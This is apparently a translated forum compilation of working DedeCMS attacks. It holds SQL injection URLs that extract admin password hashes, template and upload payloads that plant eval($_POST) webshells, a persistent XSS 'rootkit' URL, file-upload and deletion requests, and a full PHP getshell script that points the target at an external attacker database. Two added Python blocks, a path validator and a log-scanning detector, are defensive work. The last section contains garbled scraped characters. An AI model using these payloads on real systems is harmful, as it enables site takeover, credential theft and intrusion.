Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; afterwards, visiting either of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "
Exploit Success \n";
    if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value, and you enter the site backend directly.
The precondition for this vulnerability is that the backend path must already be known.
Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit using the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our carefully crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(construct this part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if the site reports that the edit succeeded, we have changed the template path. 3. Visit the modified article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif.
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
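Both template-execution sections above (the V5.6 Final one and the 5.3/5.6 Get Shell one) work because article_edit.php accepts a client-supplied templet value such as ../uploads/userup/3/1.gif, smuggled in through dede_addonfields. The following Python is an added defender-side example, not code from the original post or from DedeCMS: it shows the two server-side checks that close that path, a resolver that keeps templet inside the template directory and limits it to template extensions, and a filter that derives the addon-field list from the channel model instead of the request. TEMPLET_ROOT and the channel field set are assumed values.

```python
import posixpath
from typing import List, Optional, Set

# Assumed install layout (constructed, not from the original post): all
# article templates live under this directory and nothing else is a template.
TEMPLET_ROOT = "/var/www/dede/templets"
ALLOWED_EXT = (".htm", ".html")


def resolve_templet(user_value: str) -> Optional[str]:
    """Resolve a client-supplied `templet` value against TEMPLET_ROOT.

    Returns the absolute template path, or None when the value is empty,
    contains a NUL byte, climbs out of the template directory with `..`
    (e.g. ../uploads/userup/3/1.gif), or does not end in a template
    extension. Rejecting these means an uploaded image can never be
    handed to the template engine, whatever runphp tags it contains."""
    if not user_value or "\x00" in user_value:
        return None
    joined = posixpath.join(TEMPLET_ROOT, user_value.lstrip("/"))
    # normpath collapses ../ segments, so the prefix test is made on the
    # path that would really be opened, not on the raw string.
    candidate = posixpath.normpath(joined)
    if not candidate.startswith(TEMPLET_ROOT + "/"):
        return None
    if not candidate.lower().endswith(ALLOWED_EXT):
        return None
    return candidate


def filter_addon_fields(requested: str, channel_fields: Set[str]) -> List[str]:
    """Keep only the addon field names that the channel model defines.

    The forms above send dede_addonfields="templet,htmltext;" so that the
    save routine treats `templet` as a writable article field. When the
    server intersects the request with its own channel definition, the
    smuggled name is simply dropped."""
    names = [n.strip() for n in requested.rstrip(";").split(",")]
    return [n for n in names if n and n in channel_fields]


if __name__ == "__main__":
    for v in ("article_default.htm", "../uploads/userup/3/1.gif",
              "../uploads/userup/2/12OMX04-15A.jpg", "default/../index.htm"):
        print(repr(v), "->", resolve_templet(v))
    print(filter_addon_fields("templet,htmltext;", {"htmltext"}))
```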
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 characters removed, giving a 20-character MD5; then remove 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
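Several sections above rely on the same request shapes: client-controlled _COOKIE[GLOBALS][cfg_*] or _POST[GLOBALS][cfg_*] keys (the variable-overwrite getshell script, the mytag_js.php form and the login.php backend bypass), bare cfg_* fields with register_globals on (the select_soft_post.php page just shown), a raw sql parameter to plus/advancedsearch.php, and markup in the gotopage parameter. The following Python is an added detection example, not code from the original post or from DedeCMS: it parses constructed Apache-style log lines and reports the requests that carry any of those shapes. All IPs, paths and log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format log lines (not from the original post), mixing
# the request shapes discussed on this page with one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2013:10:00:01 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2013:10:00:02 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2013:10:00:03 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048 "-" "curl/7.29"
10.0.0.7 - - [01/Jan/2013:10:00:04 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.8 - - [01/Jan/2013:10:00:05 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)

# DedeCMS's request-import loop copied every _GET/_POST/_COOKIE key into a
# global, so _COOKIE[GLOBALS][cfg_dbhost]=... (or a bare cfg_basedir=... with
# register_globals on) rewrote configuration. No legitimate client parameter
# starts with cfg_/GLOBALS or nests GLOBALS / cfg_* inside brackets.
PROTECTED_KEY_RE = re.compile(
    r'^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_REQUEST)|\[(GLOBALS|cfg_[A-Za-z_]+)\]',
    re.I,
)


def classify(target: str) -> list:
    """Return the reasons a request target (path plus query string) matches
    one of the attack shapes on this page; an empty list means no match."""
    parts = urlsplit(target)
    path = parts.path.lower()
    reasons = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if PROTECTED_KEY_RE.search(key):
            reasons.append(f"variable override via {key}")
        if path.endswith("/plus/advancedsearch.php") and key == "sql":
            reasons.append("raw sql parameter to advancedsearch.php")
        if key == "gotopage" and re.search(r'[<>"]|script', value, re.I):
            reasons.append("markup in gotopage (reflected/persisted XSS)")
    return reasons


def scan_log(text: str) -> list:
    """Parse each line and keep (ip, target, reasons) for flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            findings.append((m["ip"], m["target"], reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

classify() only sees what the access log records, so for POST bodies (the mytag_js.php form and select_soft_post.php) it has to be run over a request log that captures the body, or placed in front of the import loop as a request filter.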
% ^/ f) Y0 x& {! |, T织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
4 Y, g) `. g1 p4 F利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
8 x# x# G$ @5 f" Z1. 访问网址:+ q5 F$ w! v2 g7 W
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ ]1 G1 t* k0 Z6 {3 G5 ] g) r6 O& P
可看见错误信息: J1 j& H& f' Y4 L) g+ V3 D
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Open the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*